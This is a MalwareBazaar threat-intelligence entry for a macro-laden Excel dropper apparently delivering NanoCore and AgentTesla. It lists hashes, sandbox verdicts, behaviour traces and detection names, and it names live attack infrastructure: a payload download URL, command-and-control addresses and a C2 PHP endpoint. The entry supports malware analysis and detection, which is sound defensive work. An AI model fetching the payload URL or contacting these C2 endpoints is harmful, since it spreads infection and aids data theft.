MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 55c32a9bd16c2d9113c92d2b57f2204aee9f1685c0496cea083309bb70d86c6f. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


NanoCore


Vendor detections: 12


Maldoc score: 22


Intelligence 12 IOCs 1 YARA 5 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 55c32a9bd16c2d9113c92d2b57f2204aee9f1685c0496cea083309bb70d86c6f
SHA3-384 hash: 54c18fc201670ee1dce0fbefa2269913b70daf999b1cfebff445053af2f8f11796257e027db0cbafbdfd32823a92d31a
SHA1 hash: ae03c0d7a946d97b148af77436f7495e0d9096a4
MD5 hash: 2da13a1f88dfb75e1f1a37fc4212adf4
humanhash: chicken-beer-victor-carpet
File name:IMG00120474.xls
Download: download sample
Signature NanoCore
Create hunting rule
File size:516'608 bytes
First seen:2022-10-27 06:40:47 UTC
Last seen:Never
File type:Excel file xls
MIME type:application/vnd.ms-excel
ssdeep 12288:Sf7+Zft5H0dos08l9ZLB/m9UCNB6xRNZw:STB08lzL9qNB6xRN
TLSH T12BB4BF6275C18A71E4192B33A9C6710D773EEF239D81AD1B397ABF5C0E367049912B0E
TrID 46.5% (.XLS) Microsoft Excel sheet (alternate) (56500/1/4)
26.7% (.XLS) Microsoft Excel sheet (32500/1/3)
20.1% (.XLS) Microsoft Excel sheet (alternate) (24500/1/2)
6.5% (.) Generic OLE2 / Multistream Compound (8000/1)
Reporter abuse_ch
Tags:NanoCore RAT xls


Avatar
abuse_ch
NanoCore C2:
37.139.128.94:6000

Indicators Of Compromise (IOCs)

Below is a list of indicators of compromise (IOCs) associated with this malware samples.

IOCThreatFox Reference
37.139.128.94:6000 https://threatfox.abuse.ch/ioc/949957/

Office OLE Information

This malware samples appears to be an Office document. The following table provides more information about this document using oletools and oledump.

OLE id
Maldoc score: 22
OLE dump

MalwareBazaar was able to identify 15 sections in this file using oledump:

Section IDSection sizeSection name
1107 bytesCompObj
2244 bytesDocumentSummaryInformation
3208 bytesSummaryInformation
4335161 bytesWorkbook
5473 bytes_VBA_PROJECT_CUR/PROJECT
686 bytes_VBA_PROJECT_CUR/PROJECTwm
7951 bytes_VBA_PROJECT_CUR/VBA/Module1
8991 bytes_VBA_PROJECT_CUR/VBA/Sheet1
9162368 bytes_VBA_PROJECT_CUR/VBA/ThisWorkbook
102852 bytes_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
111760 bytes_VBA_PROJECT_CUR/VBA/__SRP_0
12209 bytes_VBA_PROJECT_CUR/VBA/__SRP_1
131003 bytes_VBA_PROJECT_CUR/VBA/__SRP_2
14390 bytes_VBA_PROJECT_CUR/VBA/__SRP_3
15564 bytes_VBA_PROJECT_CUR/VBA/dir
OLE vba

MalwareBazaar was able to extract and deobfuscate VBA script(s) the following information from OLE objects embedded in this file using olevba:

TypeKeywordDescription
AutoExecAutoOpenRuns when the Word document is opened
AutoExecWorkbook_OpenRuns when the Excel Workbook is opened
IOCsvchost.exeExecutable file name
IOCIMG00120474.exeExecutable file name
SuspiciousOpenMay open a file
SuspiciouswriteMay write to a file (if combined with Open)
SuspiciousAdodb.StreamMay create a text file
SuspicioussavetofileMay create a text file
SuspiciousShellMay run an executable file or a system command
SuspiciousWScript.ShellMay run an executable file or a system command
SuspiciousRunMay run an executable file or a system command
SuspiciousCreateObjectMay create an OLE object
SuspiciousMicrosoft.XMLHTTPMay download files from the Internet
SuspiciousHex StringsHex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)

Intelligence

File Origin
# of uploads :
1
# of downloads :
291
Origin country :
n/a
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
IMG00120474.xls
Verdict:
Malicious activity
Analysis date:
2022-10-27 06:43:10 UTC
Tags:
macros macros-on-open
Link:
https://app.any.run/tasks/7d93ca46-374a-4312-a4de-2ab93b5923c0

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/324715/
Detection(s):
MiscreantPunch.EvilMacro.AODBWSRBMS.UNOFFICIAL
Create hunting rule

Doc.Dropper.Agent-6412232-1
Create hunting rule

SecuriteInfo.com.Office.Macro-11.UNOFFICIAL
Create hunting rule

Sanesecurity.Badmacro.Xls.Wshell.G.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malware
Maliciousness:

Behaviour
Searching for the window
Creating a window
Сreating synchronization primitives
Creating a file in the %temp% directory
Searching for synchronization primitives
Creating a file
Enabling the 'hidden' option for files in the %temp% directory
Launching a process
Query of malicious DNS domain
Sending an HTTP GET request to an infection source by exploiting the app vulnerability
Creating a process from a recently created file
Result
Verdict:
Malicious
File Type:
Legacy Excel File with Macro
Link:
https://app.docguard.net/55c32a9bd16c2d9113c92d2b57f2204aee9f1685c0496cea083309bb70d86c6f/results/dashboard
Payload URLs
URL
File name
http://oslobikerental.no.ww18.online4u.no/wp-includes/ID2/ups/IMG00120474.exe
ThisWorkbook
Behaviour
BlacklistAPI detected
Document image
Image:
Download PNG
Document image
Label:
Malicious
Suspicious Score:
7.6/10
Score Malicious:
76%
Score Benign:
24%
Link:
https://www.malware.ai/gui/files/?id=a9079d0f-ec70-4dc1-b663-15314214fd05
Result
Verdict:
MALICIOUS
Link:
https://labs.inquest.net/dfi/sha256/55c32a9bd16c2d9113c92d2b57f2204aee9f1685c0496cea083309bb70d86c6f
Details
Macro with Startup Hook
Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.
Macro with File System Write
Detected macro logic that can write data to the file system.
Macro Contains Suspicious String
Detected a macro with a suspicious string. Suspicious strings include privileged function calls, obfuscations, odd registry keys, etc...
Result
Threat name:
Unknown
Detection:
malicious
Classification:
expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1099025
Signature
Antivirus detection for dropped file
Antivirus detection for URL or domain
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Found API chain indicative of sandbox detection
Machine Learning detection for sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office process drops PE file
Snort IDS alert for network traffic
Yara detected AntiVM autoit script
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 731676 Sample: IMG00120474.xls Startdate: 27/10/2022 Architecture: WINDOWS Score: 100 84 Snort IDS alert for network traffic 2->84 86 Multi AV Scanner detection for domain / URL 2->86 88 Antivirus detection for URL or domain 2->88 90 12 other signatures 2->90 9 EXCEL.EXE 53 24 2->9         started        14 wscript.exe 1 2->14         started        16 wscript.exe 2->16         started        18 3 other processes 2->18 process3 dnsIp4 72 oslobikerental.no.ww18.online4u.no 213.160.235.113, 49171, 80 ASN-CATCHCOMNO Norway 9->72 66 C:\Users\user\AppData\Local\...\svchost.exe, PE32 9->66 dropped 68 C:\Users\user\AppData\...\IMG00120474[1].exe, PE32 9->68 dropped 70 C:\Users\user\Desktop\IMG00120474.xls, Composite 9->70 dropped 102 Document exploit detected (creates forbidden files) 9->102 20 svchost.exe 36 9->20         started        24 cmd.exe 14->24         started        26 cmd.exe 16->26         started        28 cmd.exe 18->28         started        30 cmd.exe 18->30         started        file5 signatures6 process7 file8 60 C:\Users\user\AppData\Local\Temp\...\gst.exe, PE32 20->60 dropped 62 C:\Users\user\AppData\...\fwlpehujtj.exe, PE32 20->62 dropped 92 Multi AV Scanner detection for dropped file 20->92 32 gst.exe 35 20->32         started        36 wscript.exe 2 1 20->36         started        38 fwlpehujtj.exe 1 24->38         started        40 fwlpehujtj.exe 26->40         started        42 akfng.exe 28->42         started        44 akfng.exe 30->44         started        signatures9 process10 file11 56 C:\Users\user\AppData\Local\...\akfng.exe, PE32 32->56 dropped 74 Multi AV Scanner detection for dropped file 32->74 46 wscript.exe 32->46         started        48 fwlpehujtj.exe 2 6 36->48         started        signatures12 process13 file14 52 akfng.exe 46->52         started        58 C:\Users\user\AppData\Local\...\start.vbs, ASCII 48->58 dropped 76 Antivirus detection for dropped file 48->76 78 Multi AV Scanner detection for dropped file 48->78 80 Creates autostart registry keys with suspicious values (likely registry only malware) 48->80 82 2 other signatures 48->82 signatures15 process16 file17 64 C:\Users\user\AppData\Local\...\start.vbs, ASCII 52->64 dropped 94 Antivirus detection for dropped file 52->94 96 Multi AV Scanner detection for dropped file 52->96 98 Creates autostart registry keys with suspicious values (likely registry only malware) 52->98 100 Creates multiple autostart registry keys 52->100 signatures18
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/55c32a9bd16c2d9113c92d2b57f2204aee9f1685c0496cea083309bb70d86c6f/
Threat name:
Document-Word.Trojan.Valyria
Create hunting rule
Status:
Malicious
First seen:
2022-10-27 03:11:45 UTC
File Type:
Document
Extracted files:
20
AV detection:
17 of 39 (43.59%)
Threat level:
  5/5
Detection(s):
Malicious file
Link:
https://check.spamhaus.org/check/?searchterm=kxbsvg6rnqwzce6jfuvvp4rajlxj6fufybewz2qigme3w4gynrxq._file
Result
Malware family:
agenttesla
Create hunting rule
Score:
  10/10
Tags:
family:agenttesla collection keylogger macro macro_on_action persistence spyware stealer trojan
Link:
https://tria.ge/reports/221027-hfrqhsbdaj/
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
outlook_office_path
outlook_win_path
Office loads VBA resources, possible macro or embedded object present
Enumerates physical storage devices
Suspicious use of SetThreadContext
Accesses Microsoft Outlook profiles
Adds Run key to start application
Looks up external IP address via web service
Checks computer location settings
Drops startup file
Loads dropped DLL
Downloads MZ/PE file
Executes dropped EXE
AgentTesla
Malware Config
C2 Extraction:
http://107.189.4.253/boots/inc/a155b6dca5b411.php
Verdict:
Suspicious
Tags:
n/a
YARA:
n/a
Link:
https://app.threat.zone/submission/5c50b9cb-b0c2-41e5-9ba4-8f4ec04bf097
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Nanocore
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/55c32a9bd16c2d9113c92d2b57f2204aee9f1685c0496cea083309bb70d86c6f

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:BitcoinAddress
Create hunting rule
Author:Didier Stevens (@DidierStevens)
Description:Contains a valid Bitcoin address
Rule name:informational_win_ole_protected
Create hunting rule
Author:Jeff White (karttoon@gmail.com) @noottrak
Description:Identify OLE Project protection within documents.
Rule name:malware_shellcode_hash
Create hunting rule
Author:JPCERT/CC Incident Response Group
Description:detect shellcode api hash value
Rule name:meth_get_eip
Create hunting rule
Author:Willi Ballenthin
Rule name:pdb_YARAify
Create hunting rule
Author:@wowabiy314
Description:PDB

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/324715/

Comments